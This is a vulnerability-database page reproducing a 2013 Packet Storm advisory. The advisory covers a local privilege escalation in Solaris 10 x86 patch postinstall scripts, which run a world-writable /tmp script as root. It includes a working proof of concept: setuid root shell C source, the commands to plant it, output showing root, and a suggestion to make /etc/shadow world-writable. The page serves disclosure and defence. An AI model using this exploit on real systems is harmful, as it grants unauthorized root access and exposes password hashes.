Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLarry W. CashdollarPACKETSTORM:122306
HistoryJul 08, 2013 - 12:00 a.m.

Solaris Recommended Patch Cluster 6/19 Local Root

2013-07-0800:00:00
Larry W. Cashdollar
packetstormsecurity.com
24

EPSS

0

Percentile

0.4%

JSON
`Solaris Recommended Patch Cluster 6/19 local root on x86  
  
Larry W. Cashdollar  
7/3/2013  
@_larry0  
If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based.  
Local root:  
Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root.  
./144751-01/SUNWos86r/install/postinstall   
  
  
782 if [ -s /tmp/disketterc.d/rcs9.sh ]  
783 then  
784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post"  
785 fi  
  
Inject entries into driver_aliases, research config file? maybe we can load our own library/driver?  
804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs)  
805 TMPFILE=/tmp/ncrstmp  
806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL  
E  
807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases  
  
  
./141445-09/SUNWos86r/install/postinstall  
  
  
656 if [ -s /tmp/disketterc.d/rcs9.sh ]  
657 then  
658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post"  
659 fi  
  
  
Well, it looks like you've got a few chances to abuse it:  
  
  
larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \;  
./144501-19/SUNWos86r/install/postinstall  
./141445-09/SUNWos86r/install/postinstall  
./142059-01/SUNWos86r/install/postinstall  
./147148-26/SUNWos86r/install/postinstall  
./127128-11/SUNWos86r/install/postinstall  
./148889-03/SUNWos86r/install/postinstall  
./142910-17/SUNWos86r/install/postinstall  
./144751-01/SUNWos86r/install/postinstall  
  
Psuedo PoC:  
Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry.  
chmod 666 /etc/shadow would be easy.  
PoC:  
larry@slowaris:~$ cat setuid.c   
#include   
#include   
int  
main (void)  
{  
char *shell[2];  
shell[0] = "sh";  
shell[1] = NULL;  
setregid (0, 0);  
setreuid (0, 0);  
execve ("/bin/sh", shell, NULL);  
return(0);  
}  
gcc -o /tmp/r00t setuid.c  
larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t  
After patches have been applied:  
larry@slowaris:~$ /tmp/r00t  
# id  
uid=0(root) gid=0(root)  
`

Related

cve 1
prion 1
cvelist 1
exploitdb 3
nvd 1
cve
cve
CVE-2010-1183
2010-03-29 22:30:00
prion
prion
Design/Logic Flaw
2010-03-29 22:30:00
cvelist
cvelist
CVE-2010-1183
2010-03-29 22:00:00
exploitdb
exploitdb
Solaris 10 Patch 137097-01 - Symlink Privilege Escalation
2012-08-11 00:00:00
Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities
2010-03-24 00:00:00
Solaris Recommended Patch Cluster 6/19 (x86) - Local Privilege Escalation
2013-07-09 00:00:00
nvd
nvd
CVE-2010-1183
2010-03-29 22:30:00

EPSS

0

Percentile

0.4%

JSON
Related for PACKETSTORM:122306
cve1prion1cvelist1exploitdb3nvd1